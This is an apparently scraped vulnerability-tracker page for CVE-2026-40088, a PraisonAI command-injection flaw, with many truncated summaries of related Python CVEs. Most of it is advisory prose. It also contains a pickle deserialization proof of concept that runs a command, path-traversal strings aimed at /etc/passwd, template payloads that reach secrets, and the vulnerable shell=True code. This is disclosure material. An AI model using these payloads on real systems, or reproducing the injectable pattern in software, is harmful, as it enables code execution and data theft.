CVE-2026-40088
Published 2026-04-09
Priority P3 · 54 · critical · 9.6 · CVSS 3.1
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
EPSS: 0.42% (33.5th percentile)
PraisonAI is a multi-agent teams system. Prior to 4.5.121, the execute_command function and workflow shell execution are exposed to user-controlled input via agent workflows, YAML definitions, and LLM-generated tool calls, allowing attackers to inject arbitrary shell commands through shell metacharacters. This vulnerability is fixed in 4.5.121.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mervinpraison | praisonai | < 4.5.121 | 4.5.121 |
| mervinpraison | praisonai | >= 0 < 4.5.121 | 4.5.121 |
| praison | praisonai | < 4.5.121 | 4.5.121 |
VulDB
MervinPraison PraisonAI up to 4.5.120 execute_command os command injection
vuldb·2026-04-09·CVSS 9.6
CVE-2026-40088 [CRITICAL] MervinPraison PraisonAI up to 4.5.120 execute_command os command injection
A vulnerability has been found in MervinPraison PraisonAI up to 4.5.120 and classified as critical. The affected element is the function execute_command. The manipulation leads to os command injection.
This vulnerability is documented as CVE-2026-40088. The attack can be initiated remotely. There is not any exploit available.
The affected component should be upgraded.
OSV
PraisonAI Vulnerable to OS Command Injection
osv·2026-04-08
CVE-2026-40088 [CRITICAL] PraisonAI Vulnerable to OS Command Injection
The `execute_command` function and workflow shell execution are exposed to user-controlled input via agent workflows, YAML definitions, and LLM-generated tool calls, allowing attackers to inject arbitrary shell commands through shell metacharacters.
---
## Description
PraisonAI's workflow system and command execution tools pass user-controlled input directly to `subprocess.run()` with `shell=True`, enabling command injection attacks. Input sources include:
1. YAML workflow step definitions
2. Agent configuration files (agents.yaml)
3. LLM-generated tool call parameters
4. Recipe step configurations
The `shell=True` parameter causes the shell to interpret metacharacters (`;`, `|`, `&&`, `$()`, etc.), allowing attackers to execute arbitrary
GHSA
PraisonAI Vulnerable to OS Command Injection
ghsa·2026-04-08
CVE-2026-40088 [CRITICAL] CWE-78 PraisonAI Vulnerable to OS Command Injection
No detection rules found.
No public exploits indexed.
Checkpoint
11th December – Threat Intelligence Report
blogs_checkpoint·2023-12-11
CVE-2023-40088 11th December – Threat Intelligence Report
## 11th December – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 11th December, please download our Threat Intelligence Bulletin.
TOP ATTACKS AND BREACHES
The American Greater Richmond Transit Company (GRTC), which provides services for millions of people, has been the victim of a cyber-attack that impacted certain applications and parts of the GRTC network. The Play ransomware gang claimed responsibility for the attack.
Check Point Harmony Endpoint and Threat Emulation prov
Wiz
CVE-2026-33753 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.2
CVE-2026-33753 [MEDIUM] CVE-2026-33753 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33753 :
Python vulnerability analysis and mitigation
rfc3161-client is a Python library implementing the Time-Stamp Protocol (TSP) described in RFC 3161. Prior to 1.0.6, an Authorization Bypass vulnerability in rfc3161-client's signature verification allows any attacker to impersonate a trusted TimeStamping Authority (TSA). By exploiting a logic flaw in how the library extracts the leaf certificate from an unordered PKCS#7 bag of certificates, an attacker can append a spoofed certificate matching the target common_name and Extended Key Usage (EKU) requirements. This tricks the library into verifying these authorization rules against the forged certificate while validating the cryptographic signature against an actual trusted TSA (such as FreeTSA), thereby bypassing the intend
Wiz
CVE-2026-39844 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.9
CVE-2026-39844 [MEDIUM] CVE-2026-39844 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-39844 :
Python vulnerability analysis and mitigation
NiceGUI is a Python-based UI framework. Prior to 3.10.0, since PurePosixPath only recognizes forward slashes (/) as path separators, an attacker can bypass this sanitization on Windows by using backslashes (\) in the upload filename. Applications that construct file paths using file.name (a pattern demonstrated in NiceGUI's bundled examples) are vulnerable to arbitrary file write on Windows. This vulnerability is fixed in 3.10.0.
Source : NVD
## 5.9
Score
Published April 8, 2026
Severity MEDIUM
CNA Score 5.9
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 15.9
Exploitation Probability (EPSS) 0
Wiz
CVE-2026-40087 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.4
CVE-2026-40087 [MEDIUM] CVE-2026-40087 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-40087 :
Python vulnerability analysis and mitigation
LangChain is a framework for building agents and LLM-powered applications. Prior to 0.3.84 and 1.2.28, LangChain's f-string prompt-template validation was incomplete in two respects. First, some prompt template classes accepted f-string templates and formatted them without enforcing the same attribute-access validation as PromptTemplate. In particular, DictPromptTemplate and ImagePromptTemplate could accept templates containing attribute access or indexing expressions and subsequently evaluate those expressions during formatting. Second, f-string validation based on parsed top-level field names did not reject nested replacement fields inside format specifiers. In this pattern, the nested replacement field appears in the for
Wiz
CVE-2026-39890 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.8
CVE-2026-39890 [CRITICAL] CVE-2026-39890 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-39890 :
Python vulnerability analysis and mitigation
PraisonAI is a multi-agent teams system. Prior to 4.5.115, the AgentService.loadAgentFromFile method uses the js-yaml library to parse YAML files without disabling dangerous tags (such as !!js/function and !!js/undefined). This allows an attacker to craft a malicious YAML file that, when parsed, executes arbitrary JavaScript code. An attacker can exploit this vulnerability by uploading a malicious agent definition file via the API endpoint, leading to remote code execution (RCE) on the server. This vulnerability is fixed in 4.5.115.
Source : NVD
## 9.8
Score
Published April 8, 2026
Severity CRITICAL
CNA Score 9.8
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/
Wiz
CVE-2026-35592 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.1
CVE-2026-35592 [HIGH] CVE-2026-35592 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-35592 :
Python vulnerability analysis and mitigation
pyLoad is a free and open-source download manager written in Python. Prior to 0.5.0b3.dev97, the _safe_extractall() function in src/pyload/plugins/extractors/UnTar.py uses os.path.commonprefix() for its path traversal check, which performs character-level string comparison rather than path-level comparison. This allows a specially crafted tar archive to write files outside the intended extraction directory. The correct function os.path.commonpath() was added to the codebase in the CVE-2026-32808 fix (commit 5f4f0fa) but was never applied to _safe_extractall(), making this an incomplete fix. This vulnerability is fixed in 0.5.0b3.dev97.
Source : NVD
## 5.3
Score
Published April 7, 2026
Severity MEDIUM
CNA Score 5.3
Wiz
CVE-2026-35586 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.8
CVE-2026-35586 [MEDIUM] CVE-2026-35586 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-35586 :
Python vulnerability analysis and mitigation
pyLoad is a free and open-source download manager written in Python. Prior to 0.5.0b3.dev97, the ADMIN_ONLY_CORE_OPTIONS authorization set in set_config_value() uses incorrect option names ssl_cert and ssl_key, while the actual configuration option names are ssl_certfile and ssl_keyfile. This name mismatch causes the admin-only check to always evaluate to False, allowing any user with SETTINGS permission to overwrite the SSL certificate and key file paths. Additionally, the ssl_certchain option was never added to the admin-only set at all. This vulnerability is fixed in 0.5.0b3.dev97.
Source : NVD
## 6.8
Score
Published April 7, 2026
Severity MEDIUM
CNA Score 6.8
Affected Technologies
Python
Has Public Exploit No
Wiz
GHSA-9gjv-jvm7-vv2v Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
GHSA-9gjv-jvm7-vv2v Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-9gjv-jvm7-vv2v :
Python vulnerability analysis and mitigation
## Summary
GET /api/people/
GET /api/places/
GET /api/events/
## Affected Versions
All versions of Gramps Web API prior to the fix.
## Root Cause
PrivateProxyDb.iter_*()
ProxyDbBase.__iter_object()
iter_*()
PrivateProxyDb
PrivateProxyDb.get_*_from_handle()
sanitize_*()
ModifiedPrivateProxyDb
iter_*()
PrivateProxyDb
## Conditions Required
This issue only affects trees in which sub-objects have been explicitly marked private in Gramps desktop. The Gramps Web frontend UI does not expose controls for setting the private flag on sub-objects (alternate names, addresses, notes, citations, media references, event references, etc.). In practice, such flags are set in Gramps desktop and then synced or imp
Wiz
CVE-2026-39413 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.2
CVE-2026-39413 [MEDIUM] CVE-2026-39413 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-39413 :
Python vulnerability analysis and mitigation
LightRAG provides simple and fast retrieval-augmented generation. Prior to 1.4.14, the LightRAG API is vulnerable to a JWT algorithm confusion attack where an attacker can forge tokens by specifying 'alg': 'none' in the JWT header. Since the jwt.decode() call does not explicitly deny the 'none' algorithm, a crafted token without a signature will be accepted as valid, leading to unauthorized access. This vulnerability is fixed in 1.4.14.
Source : NVD
## 4.2
Score
Published April 8, 2026
Severity MEDIUM
CNA Score 4.2
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6.3
Exploitation Probability (
Wiz
CVE-2026-5600 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.4
CVE-2026-5600 [MEDIUM] CVE-2026-5600 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-5600 :
Python vulnerability analysis and mitigation
A new API endpoint introduced in pretix 2025 that is supposed to
return all check-in events of a specific event in fact returns all
check-in events belonging to the respective organizer. This allows an
API consumer to access information for all other events under the same
organizer, even those they should not have access to.
These records contain information on the time and result of every ticket scan as well as the ID of the matched ticket. Example:
```json
{
  "id": 123,
  "successful": true,
  "error_reason": null,
  "error_explanation": null,
  "position": 321,
  "datetime": "2020-08-23T09:00:00+02:00",
  "list": 456,
  "created": "2020-08-23T09:00:00+02:00",
  "auto_checked_in": false,
  "gate": null,
  "device": 1,
  "device_id": 1,
  "type": "entry"
}
```
Wiz
CVE-2026-39888 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.9
CVE-2026-39888 [CRITICAL] CVE-2026-39888 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-39888 :
Python vulnerability analysis and mitigation
PraisonAI is a multi-agent teams system. Prior to 1.5.115, execute_code() in praisonaiagents.tools.python_tools defaults to sandbox_mode="sandbox", which runs user code in a subprocess wrapped with a restricted builtins dict and an AST-based blocklist. The AST blocklist embedded inside the subprocess wrapper (blocked_attrs of python_tools.py) contains only 11 attribute names — a strict subset of the 30+ names blocked in the direct-execution path. The four attributes that form a frame-traversal chain out of the sandbox are all absent from the subprocess list (`__traceback__`, `tb_frame`, `f_back`, and `f_builtins`). Chaining these attributes through a caught exception exposes the real Python builtins dict of the subprocess wrapper fra
Wiz
CVE-2026-1163 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.1
CVE-2026-1163 [MEDIUM] CVE-2026-1163 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-1163 :
Python vulnerability analysis and mitigation
An insufficient session expiration vulnerability exists in the latest version of parisneo/lollms. The application fails to invalidate active sessions after a password reset, allowing an attacker to continue using an old session token. This issue arises due to the absence of logic to reject requests after a period of inactivity and the excessively long default session duration of 31 days. The vulnerability enables an attacker to maintain persistent access to a compromised account, even after the victim resets their password.
Source : NVD
## 4.1
Score
Published April 8, 2026
Severity MEDIUM
CNA Score 4.1
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV
Wiz
CVE-2026-39981 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.8
CVE-2026-39981 [HIGH] CVE-2026-39981 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-39981 :
Python vulnerability analysis and mitigation
AGiXT is a dynamic AI Agent Automation Platform. Prior to 1.9.2, the safe_join() function in the essential_abilities extension fails to validate that resolved file paths remain within the designated agent workspace. An authenticated attacker can use directory traversal sequences to read, write, or delete arbitrary files on the server hosting the AGiXT instance. This vulnerability is fixed in 1.9.2.
Source : NVD
## 8.8
Score
Published April 9, 2026
Severity HIGH
CNA Score 8.8
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) N/A
Exploitation Probability (EPSS) N/A
Affected packages and librarie
Wiz
GHSA-766v-q9x3-g744 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
GHSA-766v-q9x3-g744 Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-766v-q9x3-g744 :
Python vulnerability analysis and mitigation
## Summary
MultiAgentLedger
MultiAgentMonitor
MultiAgentLedger
MultiAgentMonitor
base_path
../
## Details
## Vulnerability 1: Memory State Leakage
examples/context/12_multi_agent_context.py:68
MultiAgentLedger
self.ledgers
get_agent_ledger
Exploitability : An attacker can register an agent with the same ID as a victim agent to gain access to their ledger. This is particularly dangerous in multi-tenant systems where agents may handle sensitive user data.
## Vulnerability 2: Path Traversal
examples/context/12_multi_agent_context.py:106
MultiAgentMonitor
base_path
../../malicious
base_path
../../etc/passwd
## PoC
## Memory State Leakage
multi_ledger = MultiAgentLedger()
# Victim agent (use
Wiz
CVE-2026-39373 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.8
CVE-2026-39373 [MEDIUM] CVE-2026-39373 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-39373 :
Python vulnerability analysis and mitigation
JWCrypto implements JWK, JWS, and JWE specifications using python-cryptography. Prior to 1.5.7, an unauthenticated attacker can exhaust server memory by sending crafted JWE tokens with ZIP compression. The existing patch for CVE-2024-28102 limits input token size to 250KB but does not validate the decompressed output size. An unauthenticated attacker can cause memory exhaustion on memory-constrained systems. A token under the 250KB input limit can decompress to approximately 100MB. This vulnerability is fixed in 1.5.7.
Source : NVD
## 5.3
Score
Published April 7, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Python
Linux Debian
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
Wiz
CVE-2026-39376 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2026-39376 [HIGH] CVE-2026-39376 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-39376 :
Python vulnerability analysis and mitigation
FastFeedParser is a high performance RSS, Atom and RDF parser. Prior to 0.5.10, when parse() fetches a URL that returns an HTML page containing a `<meta http-equiv="refresh">` tag, it recursively calls itself with the redirect URL — with no depth limit, no visited-URL deduplication, and no redirect count cap. An attacker-controlled server that returns an infinite chain of HTML meta-refresh responses causes unbounded recursion, exhausting the Python call stack and crashing the process. This vulnerability can also be chained with the companion SSRF issue to reach internal network targets after bypassing the initial URL check. This vulnerability is fixed in 0.5.10.
Source : NVD
## 7.5
Score
Published April 7, 2026
Severity HIGH
CNA Score 7.5
Affec
Wiz
CVE-2026-40072 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.4
CVE-2026-40072 [MEDIUM] CVE-2026-40072 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-40072 :
Python vulnerability analysis and mitigation
web3.py allows you to interact with the Ethereum blockchain using Python. From 6.0.0b3 to before 7.15.0 and 8.0.0b2, web3.py implements CCIP Read / OffchainLookup (EIP-3668) by performing HTTP requests to URLs supplied by smart contracts in offchain_lookup_payload["urls"]. The implementation uses these contract-supplied URLs directly (after {sender} / {data} template substitution) without any destination validation. CCIP Read is enabled by default (global_ccip_read_enabled = True on all providers), meaning any application using web3.py's .call() method is exposed without explicit opt-in. This results in Server-Side Request Forgery (SSRF) when web3.py is used in backend services, indexers, APIs, or any environment that perfo
Wiz
CVE-2026-39891 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.8
CVE-2026-39891 [HIGH] CVE-2026-39891 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-39891 :
Python vulnerability analysis and mitigation
PraisonAI is a multi-agent teams system. Prior to 4.5.115, the create_agent_centric_tools() function returns tools (like acp_create_file) that process file content using template rendering. When user input from agent.start() is passed directly into these tools without escaping, template expressions in the input are executed rather than treated as literal text. This vulnerability is fixed in 4.5.115.
Source : NVD
## 8.8
Score
Published April 8, 2026
Severity HIGH
CNA Score 8.8
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 14.7
Exploitation Probability (EPSS) N/A
Affected packages and librar
Wiz
CVE-2026-31040 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.8
CVE-2026-31040 [CRITICAL] CVE-2026-31040 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-31040 :
Python vulnerability analysis and mitigation
A vulnerability was identified in stata-mcp prior to v1.13.0 where insufficient validation of user-supplied Stata do-file content can lead to command execution.
Source : NVD
## 9.8
Score
Published April 8, 2026
Severity CRITICAL
CNA Score 9.8
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.5
Exploitation Probability (EPSS) N/A
Affected packages and libraries
stata-mcp
Sources
NVD
pip Severity HIGH Has Fix Added at: Apr 09, 2026
Wiz
GHSA-r758-8hxw-4845 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.4
[MEDIUM] GHSA-r758-8hxw-4845 Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-r758-8hxw-4845 :
Python vulnerability analysis and mitigation
## Summary
justhtml
## Impact
SanitizationPolicy
drop_foreign_namespaces=False
allowlisted foreign elements such as MathML or SVG
## Affected versions
justhtml
## Notes
JustHTML(..., sanitize=True)
## Credit
justhtml
Source : NVD
## 2.1
Score
Published April 8, 2026
Severity LOW
CNA Score N/A
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) N/A
Exploitation Probability (EPSS) N/A
Affected packages and libraries
justhtml
Sources
NVD
pip Severity LOW Has Fix Added at: Apr 09, 2026
Wiz
GHSA-2763-cj5r-c79m Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
GHSA-2763-cj5r-c79m Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-2763-cj5r-c79m :
Python vulnerability analysis and mitigation
execute_command
## Description
subprocess.run()
shell=True
shell=True
;
|
&&
$()
## Affected Code
Primary command execution (shell=True default):
```python
# code/tools/execute_command.py:155-164
def execute_command(command: str, shell: bool = True, ...):
    if shell:
        result = subprocess.run(
            command,  # User-controlled input
            shell=True,  # Shell interprets metacharacters
            cwd=work_dir,
            capture_output=capture_output,
            timeout=timeout,
            env=cmd_env,
            text=True,
        )
```
Workflow shell step execution:
```python
# cli/features/job_workflow.py:234-246
def _exec_shell(self, cmd: str, step: Dict) -> Dict:
    """Execute a shell command from workflow step."""
    cwd = step.get("cwd", self._cwd)
    env = self._build_env(step)
    result = subprocess.run(
        cmd,
```
Wiz
GHSA-89gg-p5r5-q6r4 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.6
[CRITICAL] GHSA-89gg-p5r5-q6r4 Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-89gg-p5r5-q6r4 :
Python vulnerability analysis and mitigation
## Summary
algo_from_pickle
monai/auto3dseg/utils.py
pickle.loads(data_bytes)
## Details
poc
```python
import pickle
import subprocess


class MaliciousAlgo:
    def __reduce__(self):
        return (subprocess.call, (['calc.exe'],))


malicious_algo_bytes = pickle.dumps(MaliciousAlgo())
attack_data = {
    "algo_bytes": malicious_algo_bytes,
}
attack_pickle_file = "attack_algo.pkl"
with open(attack_pickle_file, "wb") as f:
    f.write(pickle.dumps(attack_data))
```
Generate the malicious file "attack_algo.pkl" through POC.
```python
from monai.auto3dseg.utils import algo_from_pickle

attack_pickle_file = "attack_algo.pkl"
result = algo_from_pickle(attack_pickle_file)
```
Ultimately, it will trigger pickle.load through a file to identify the command executio
Wiz
CVE-2026-22680 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.9
CVE-2026-22680 [MEDIUM] CVE-2026-22680 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-22680 :
Python vulnerability analysis and mitigation
OpenViking versions prior to 0.3.3 contain a missing authorization vulnerability in the task polling endpoints that allows unauthorized attackers to enumerate or retrieve background task metadata created by other users. Attackers can access the /api/v1/tasks and /api/v1/tasks/{task_id} routes without authentication to expose task type, task status, resource identifiers, archive URIs, result payloads, and error information, potentially causing cross-tenant interference in multi-tenant deployments.
Source : NVD
## 6.9
Score
Published April 7, 2026
Severity MEDIUM
CNA Score 6.9
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation
Wiz
CVE-2026-40071 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.4
CVE-2026-40071 [MEDIUM] CVE-2026-40071 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-40071 :
Python vulnerability analysis and mitigation
pyLoad is a free and open-source download manager written in Python. Prior to 0.5.0b3.dev97, the /json/package_order, /json/link_order, and /json/abort_link WebUI JSON endpoints enforce weaker permissions than the core API methods they invoke. This allows authenticated low-privileged users to execute MODIFY operations that should be denied by pyLoad's own permission model. This vulnerability is fixed in 0.5.0b3.dev97.
Source : NVD
## 5.4
Score
Published April 9, 2026
Severity MEDIUM
CNA Score 5.4
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) N/A
Exploitation Probability (EPSS) N/A
Affected
Wiz
CVE-2026-34444 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.9
CVE-2026-34444 [HIGH] CVE-2026-34444 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34444 :
Python vulnerability analysis and mitigation
Lupa integrates the runtimes of Lua or LuaJIT2 into CPython. In 2.6 and earlier, attribute_filter is not consistently applied when attributes are accessed through built-in functions like getattr and setattr. This allows an attacker to bypass the intended restrictions and eventually achieve arbitrary code execution.
Source : NVD
## 7.9
Score
Published April 6, 2026
Severity HIGH
CNA Score 7.9
Affected Technologies
Python
Linux Debian
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 20.9
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
python-lupa
lupa
Sources
NVD
Debian 11, 14 No Fix Added at: Apr
Wiz
CVE-2026-39987 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.3
CVE-2026-39987 [CRITICAL] CVE-2026-39987 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-39987 :
Python vulnerability analysis and mitigation
marimo is a reactive Python notebook. Prior to 0.23.0, Marimo has a Pre-Auth RCE vulnerability. The terminal WebSocket endpoint /terminal/ws lacks authentication validation, allowing an unauthenticated attacker to obtain a full PTY shell and execute arbitrary system commands. Unlike other WebSocket endpoints (e.g., /ws) that correctly call validate_auth() for authentication, the /terminal/ws endpoint only checks the running mode and platform support before accepting connections, completely skipping authentication verification. This vulnerability is fixed in 0.23.0.
Source : NVD
## 9.3
Score
Published April 9, 2026
Severity CRITICAL
CNA Score 9.3
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Ex
Wiz
CVE-2026-5559 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.4
CVE-2026-5559 [MEDIUM] CVE-2026-5559 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-5559 :
Python vulnerability analysis and mitigation
A vulnerability has been found in AntaresMugisho PyBlade 0.1.8-alpha/0.1.9-alpha. The affected element is the function _is_safe_ast of the file sandbox.py of the component AST Validation. Such manipulation leads to improper neutralization of special elements used in a template engine. The attack may be performed from remote. The exploit has been disclosed to the public and may be used. The project was informed of the problem early through an issue report but has not responded yet.
Source : NVD
## 5.3
Score
Published April 5, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Perc
Wiz
CVE-2026-39889 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2026-39889 [HIGH] CVE-2026-39889 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-39889 :
Python vulnerability analysis and mitigation
PraisonAI is a multi-agent teams system. Prior to 4.5.115, the A2U (Agent-to-User) event stream server in PraisonAI exposes all agent activity without authentication. The create_a2u_routes() function registers the following endpoints with NO authentication checks: /a2u/info, /a2u/subscribe, /a2u/events/{stream_name}, /a2u/events/sub/{id}, and /a2u/health. This vulnerability is fixed in 4.5.115.
Source : NVD
## 7.5
Score
Published April 8, 2026
Severity HIGH
CNA Score 7.5
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 11.4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
Wiz
CVE-2026-39892 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.9
CVE-2026-39892 [MEDIUM] CVE-2026-39892 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-39892 :
Python vulnerability analysis and mitigation
cryptography is a package designed to expose cryptographic primitives and recipes to Python developers. From 45.0.0 to before 46.0.7, if a non-contiguous buffer was passed to APIs which accepted Python buffers (e.g. Hash.update()), this could lead to buffer overflows. This vulnerability is fixed in 46.0.7.
Source : NVD
## 6.9
Score
Published April 8, 2026
Severity MEDIUM
CNA Score 6.9
Affected Technologies
Python
Wolfi
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 13
Exploitation Probability (EPSS) N/A
Affected packages and libraries
fence-agents-ibm-vpc
fence-agents-nutanix-ahv
Sources
NVD
Alpine 3.23, edge Has
Wiz
CVE-2026-39847 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.1
CVE-2026-39847 [CRITICAL] CVE-2026-39847 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-39847 :
Python vulnerability analysis and mitigation
Emmett is a full-stack Python web framework designed with simplicity. From 2.5.0 to before 2.8.1, the RSGI static handler for Emmett's internal assets (`/__emmett__` paths) is vulnerable to path traversal attacks. An attacker can use ../ sequences (e.g. `/__emmett__/../rsgi/handlers.py`) to read arbitrary files outside the assets directory. This vulnerability is fixed in 2.8.1.
Source : NVD
## 9.1
Score
Published April 7, 2026
Severity CRITICAL
CNA Score 9.1
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 16
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
emmett
Sources
NVD
pip
Wiz
GHSA-926x-3r5x-gfhw Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
GHSA-926x-3r5x-gfhw Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-926x-3r5x-gfhw :
Python vulnerability analysis and mitigation
PromptTemplate
DictPromptTemplate
ImagePromptTemplate
"{message.additional_kwargs[secret]}"
"https://example.com/{image.__class__.__name__}.png"
Second, f-string validation based on parsed top-level field names did not reject nested replacement fields inside format specifiers. For example:
"{name:{name.__class__.__name__}}"
In this pattern, the nested replacement field appears in the format specifier rather than in the top-level field name. As a result, earlier validation based on parsed field names did not reject the template even though Python formatting would still attempt to resolve the nested expression at runtime.
## Affected usage
This issue is only relevant for applications that accept untrusted templ
Wiz
CVE-2026-40088 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.4
CVE-2026-40088 [MEDIUM] CVE-2026-40088 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-40088 :
Python vulnerability analysis and mitigation
PraisonAI is a multi-agent teams system. Prior to 4.5.121, the execute_command function and workflow shell execution are exposed to user-controlled input via agent workflows, YAML definitions, and LLM-generated tool calls, allowing attackers to inject arbitrary shell commands through shell metacharacters. This vulnerability is fixed in 4.5.121.
Source : NVD
## 9.6
Score
Published April 9, 2026
Severity CRITICAL
CNA Score 9.6
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) N/A
Exploitation Probability (EPSS) N/A
Affected packages and libraries
praisonai
Sources
NVD
pip Severity CRITICAL H
2026-04-09
Published